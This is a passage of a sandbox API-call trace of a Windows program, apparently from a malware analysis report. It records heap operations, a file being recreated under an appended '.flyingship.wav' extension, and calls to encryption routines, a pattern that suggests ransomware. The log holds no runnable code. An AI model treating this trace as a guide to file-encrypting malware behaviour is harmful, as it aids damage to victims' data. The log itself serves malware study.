RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0184.601] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz")) returned 0x10 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\lftuly5i.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0184.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0184.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0184.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0184.606] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0184.606] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x77bb, lpOverlapped=0x0) returned 1 [0184.609] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0184.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77bb) returned 0xbea018 [0184.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0184.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.610] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77bb) returned 0xbf17e0 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.611] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77bb) returned 0xbea018 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.611] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0184.612] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.612] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0184.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77bb) returned 0xbea018 [0184.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0184.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0184.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0184.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0184.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x77bb) returned 0xbf8fa8 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0184.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0184.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0184.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0184.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0184.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0184.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0184.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.615] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0184.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0184.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27b8 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0184.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0184.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0184.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0184.616] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0184.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0184.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0184.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0184.617] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0184.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0184.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.618] PeekMessageW (in: lpMsg=0x87e924, 